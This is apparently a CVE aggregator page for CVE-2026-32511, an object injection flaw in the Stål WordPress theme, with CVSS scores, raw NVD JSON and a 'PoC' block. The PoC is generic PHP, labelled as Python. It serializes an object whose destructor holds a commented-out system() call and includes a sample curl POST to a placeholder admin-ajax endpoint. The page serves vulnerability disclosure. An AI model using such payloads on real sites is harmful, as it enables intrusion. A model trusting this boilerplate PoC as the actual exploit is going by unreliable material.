Security Vulnerability Report
中文
CVE-2026-32511 CVSS 5.4 MEDIUM

CVE-2026-32511

Published: 2026-03-25 17:17:03
Last Modified: 2026-04-29 10:17:17

Description

Deserialization of Untrusted Data vulnerability in Mikado-Themes Stål stal allows Object Injection.This issue affects Stål: from n/a through < 1.7.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mikado-Themes Stål < 1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // PoC for CVE-2026-32511: Object Injection in Stål Theme // This script generates a malicious serialized payload. class ExploitClass { public $cmd; public function __destruct() { // Simulated dangerous action triggered by deserialization // system($this->cmd); } } // Create the object and set the property $payload_object = new ExploitClass(); $payload_object->cmd = "id"; // Serialize the object $serialized_payload = serialize($payload_object); echo "Payload: " . urlencode($serialized_payload) . "\n"; // Usage: Send this payload to the vulnerable endpoint. // Example: curl -X POST 'http://target/wp-admin/admin-ajax.php' -d 'action=vulnerable_action&data=payload_here' ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32511", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:03.413", "lastModified": "2026-04-29T10:17:17.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in Mikado-Themes Stål stal allows Object Injection.This issue affects Stål: from n/a through < 1.7."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en Mikado-Themes Stål stal permite la inyección de objetos. Este problema afecta a Stål: desde n/a hasta &lt; 1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/stal/vulnerability/wordpress-staal-theme-1-7-arbitrary-object-instantiation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}